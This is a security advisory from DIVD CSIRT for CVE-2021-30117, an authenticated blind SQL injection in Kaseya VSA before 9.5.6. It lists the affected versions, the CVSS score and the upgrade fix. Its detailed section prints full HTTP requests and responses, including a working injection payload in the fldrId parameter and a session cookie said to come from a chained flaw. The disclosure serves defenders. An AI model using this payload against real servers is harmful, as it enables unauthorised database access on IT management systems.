CVE-2021-30117 - Authenticated SQL injection in Kaseya VSA < v9.5.6

CVE	CVE-2021-30117
Case	DIVD-2021-00011
Discovered by	Wietse Boonstra
Credits	Discovered by Wietse Boonstra of DIVD Additional research by Frank Breedijk of DIVD
Products	Kaseya: Kaseya VSA (on premise and SaaS) Kaseya VSA Agent
Versions	Kaseya: Kaseya VSA (on premise and SaaS) 9.x (< 9.5.6) Kaseya VSA Agent 9.x (< 9.5.0.23)
CVSS	Base score: 9.8
References	https://csirt.divd.nl/2021/07/07/Kaseya-Limited-Disclosure/ https://helpdesk.kaseya.com/hc/en-gb/articles/360019966738-9-5-6-Feature-Release-8-May-2021
Solution	SaaS version has been fixed by the vendor Onpremise Upgrade the server to version 9.5.6 or above Upgrade the agent to version 9.5.0.23 or above
Last modified	20 Jun 2022 09:35

Description

The API call /InstallTab/exportFldr.asp is vulnerable to a semi-authenticated boolean-based blind SQL injection in the parameter fldrId.

Detailed description

Given the following request:

GET /InstallTab/exportFldr.asp?fldrId=1’ HTTP/1.1
Host: 192.168.1.194
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.16; rv:85.0) Gecko/20100101 Firefox/85.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
Cookie: ASPSESSIONIDCQACCQCA=MHBOFJHBCIPCJBFKEPEHEDMA; sessionId=30548861;  agentguid=840997037507813; vsaUser=scopeId=3&roleId=2; webWindowId=59091519;

Where the sessionId cookie value has been obtained via CVE-2021-30116. The result should be a failure.

Response:

HTTP/1.1 500 Internal Server Error
Cache-Control: private
Content-Type: text/html; Charset=Utf-8
Date: Thu, 01 Apr 2021 19:12:11 GMT
Strict-Transport-Security: max-age=63072000; includeSubDomains
Connection: close
Content-Length: 881
 
<!DOCTYPE html>
<HTML>
 
<HEAD>
 	<title>Whoops.</title>
        <meta http-equiv="X-UA-Compatible" content="IE=Edge" />
 
 
	<link id="favIcon" rel="shortcut icon" href="/themes/default/images/favicon.ico?307447361"></link>
 
----SNIP----

However when fldrId is set to ‘(SELECT (CASE WHEN (1=1) THEN 1 ELSE (SELECT 1 UNION SELECT 2) END))’ the request is allowed.

Request:

GET /InstallTab/exportFldr.asp?fldrId=%28SELECT%20%28CASE%20WHEN%20%281%3D1%29%20THEN%201%20ELSE%20%28SELECT%201%20UNION%20SELECT%202%29%20END%29%29 HTTP/1.1
Host: 192.168.1.194
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.16; rv:85.0) Gecko/20100101 Firefox/85.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
Cookie: ASPSESSIONIDCQACCQCA=MHBOFJHBCIPCJBFKEPEHEDMA; sessionId=30548861;  agentguid=840997037507813; vsaUser=scopeId=3&roleId=2; webWindowId=59091519;

Response:

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; Charset=Utf-8
Date: Thu, 01 Apr 2021 17:33:53 GMT
Strict-Transport-Security: max-age=63072000; includeSubDomains
Connection: close
Content-Length: 7960
 
 
<html>
<head>
<title>Export Folder</title>
<style>
------ SNIP ----- 

JSON version

DIVD CSIRT

CVE-2021-30117 - Authenticated SQL injection in Kaseya VSA < v9.5.6

Description

Detailed description